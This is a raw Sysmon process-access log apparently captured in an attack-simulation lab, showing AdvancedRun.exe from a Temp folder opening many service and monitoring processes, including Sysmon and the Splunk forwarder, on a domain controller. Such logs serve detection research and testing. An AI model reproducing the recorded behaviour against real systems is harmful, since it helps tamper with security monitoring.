C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011666Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011665Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011664Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011663Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011662Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011661Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011660Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011659Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011658Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011657Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011656Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011655Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011654Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004011653Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011652Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
